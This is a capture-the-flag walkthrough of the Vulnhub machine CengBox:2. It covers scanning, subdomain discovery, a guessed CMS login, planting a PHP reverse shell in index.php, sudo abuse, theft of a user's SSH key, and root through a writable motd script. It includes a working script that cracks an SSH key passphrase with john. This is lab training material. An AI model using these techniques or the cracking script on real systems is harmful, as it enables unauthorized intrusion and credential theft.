CengBox:2 Vulnhub Walkthrough

Here is my write-up for CengBox:2, an intermediate-level vulnerable machine that can be downloaded from Vulnhub.

There are two ways to escalate privileges on this box; we will cover the first and easier one, because I really don't like msfconsole sometimes.



Walkthrough



IP of the target: 192.168.43.175

As usual, we start with nmap to find open ports and running services (all ports, default scripts and version detection):


sudo nmap -sC -sV -Pn -p- 192.168.43.175

The nmap result looks interesting; let's try anonymous login on FTP :)

We find a note.txt file. We download it to our local machine with the get command and read its contents.

We gain some useful information from this message:

  • users: Kevin and Aaron

  • password: the default password (so we can try some common passwords)

  • domain name: ceng-company.vm

So we add the line 192.168.43.175 ceng-company.vm to our /etc/hosts file.


This is what we have on port 80: nothing useful :( so let's try a directory brute force, hiding the 404 responses:


wfuzz -c -z file,/usr/share/wordlists/dirb/big.txt -t 25 --hc 404 http://ceng-company.vm/FUZZ

Unfortunately we find nothing here either.

Remembering the message from note.txt, ceng-company.vm is a domain name. What if there is a subdomain? To find out we use gobuster in vhost mode, which sends each wordlist entry as a Host header:


gobuster vhost -u ceng-company.vm -w /usr/share/wordlists/dirb/big.txt

Most of the candidates return code 400, but two subdomains return 403. The hits worth following are the ones whose status differs from the bulk of the results. We add another entry to /etc/hosts: 192.168.43.175 admin.ceng-company.vm

Now it's time for another directory brute force, this time against the new vhost :)

Let's open this directory.

This looks like a CMS. Without wasting time we try some common login pages such as /admin and /login, and we find both.

You could also find these login pages by directory brute force, but guessing common names revealed them, so I didn't bother with the brute force :)

A little guesswork gives the correct email and password:


username: Kevin@ceng-company.vm

password: ***** (#Try_Harder)

Using these credentials we log in as Kevin. Some manual browsing shows that the CMS lets us edit PHP files:

Content -> File Manager -> index.php

We replace the contents of this file with the pentestmonkey PHP reverse shell (with our IP and port filled in), start a listener on that port, and refresh the page so the server executes it.

The shell connects back to our listener and we are in as user www-data :)

Next we check what this user is allowed to run with sudo, using sudo -l.

We are allowed to run a bash script as user swartz:

sudo -u swartz /home/swartz/runphp.sh

The script lets us execute arbitrary PHP as user swartz, so we use it to spawn a shell as that user. Here I used the PHP function pcntl_exec(), which replaces the current process with the program you name; you can read more about this function online.

We are in as user swartz. Changing to /home we find one more user, mitnick, whose home directory we can read, and inside it an interesting file: his SSH private key.

We copy the id_rsa key to our local machine, restrict its permissions so ssh accepts it, and try to connect as mitnick with it:


ssh -i id_rsa mitnick@192.168.43.175

It asks for the id_rsa passphrase. We can crack it with john (after converting the key to john's format with ssh2john) and find the passphrase to be leg*****
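The passphrase step above, as an added example that is not part of the original write-up: it first classifies the copied key (legacy PEM keys announce encryption in a header, the newer OPENSSH format needs ssh-keygen to tell), then hands it to ssh2john and john. The wordlist path, the ssh2john command name (on Kali it is /usr/share/john/ssh2john.py) and the sample key are assumptions; the sample key is a constructed header with a dummy body, not a usable key.

```shell
#!/bin/sh
# Added example (not from the original walkthrough). Assumed: ssh2john and john
# are on PATH; the wordlist lives at /usr/share/wordlists/rockyou.txt.

# Print how KEY is stored and whether a passphrase protects it.
key_status() {
    key="$1"
    if grep -q '^-----BEGIN OPENSSH PRIVATE KEY-----' "$key"; then
        # New format: no header tells us, so try loading it with an empty
        # passphrase; ssh-keygen fails if one is required.
        if ssh-keygen -y -P '' -f "$key" >/dev/null 2>&1; then
            echo "openssh-plain"
        else
            echo "openssh-encrypted"
        fi
    elif grep -q '^Proc-Type: 4,ENCRYPTED' "$key"; then
        echo "pem-encrypted"          # legacy PEM with a passphrase (what ssh prompted for)
    elif grep -q '^-----BEGIN .* PRIVATE KEY-----' "$key"; then
        echo "pem-plain"
    else
        echo "unknown"
    fi
}

# Convert KEY to john's hash format and run a wordlist attack; print the
# recovered passphrase (john --show emits "file:passphrase" once it is cracked).
crack_passphrase() {
    key="$1"
    wordlist="${2:-/usr/share/wordlists/rockyou.txt}"   # assumed location
    command -v ssh2john >/dev/null 2>&1 || { echo "ssh2john not found" >&2; return 2; }
    ssh2john "$key" > "$key.hash"
    john --wordlist="$wordlist" "$key.hash" >/dev/null 2>&1 || true
    john --show "$key.hash" | head -n1 | cut -d: -f2
}

# Constructed sample keys for trying key_status offline (dummy bodies only).
make_sample_key() {
    if [ "$2" = "encrypted" ]; then
        cat > "$1" <<'EOF'
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF

AAAA
-----END RSA PRIVATE KEY-----
EOF
    else
        cat > "$1" <<'EOF'
-----BEGIN RSA PRIVATE KEY-----
AAAA
-----END RSA PRIVATE KEY-----
EOF
    fi
}

# Usage on the real key copied from the target:
#   key_status id_rsa            -> pem-encrypted
#   crack_passphrase id_rsa      -> the passphrase, if it is in the wordlist
```

Once the passphrase is known, the same ssh -i id_rsa command from above gets you in; john keeps the result in its pot file, so rerunning john --show is enough to see it again.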

We retry the same ssh command, enter the passphrase, and this time we are in.

Now we transfer the pspy64 binary to /tmp, make it executable, and run it to watch for processes started by other users without needing root.

One entry looks interesting: something is running from /etc/update-motd.d/, so we change to that directory and check the file permissions.


The permissions mean we can write to these files, so we create a file inside the home directory of user mitnick with the following content:

Then we edit the file /etc/update-motd.d/00-header as follows:

Now, why are we doing this? 00-header and the other files in that directory are not run by a root cron job, so how will this give us a root shell? The answer is that the message of the day is generated at every SSH login: pam_motd runs the scripts in /etc/update-motd.d/ (via run-parts) as root, regardless of which user is logging in. So we exit the current session, start a listener on the port we put in the script, and SSH in again as mitnick; the login runs our modified 00-header and we get a shell as root.

Let's confirm that we really have a root shell.

We are root, and this completes the challenge. I hope you liked the walkthrough, and don't forget to try the Donate option so that we can keep our website advertisement free :)


© 2020 by HacLabs.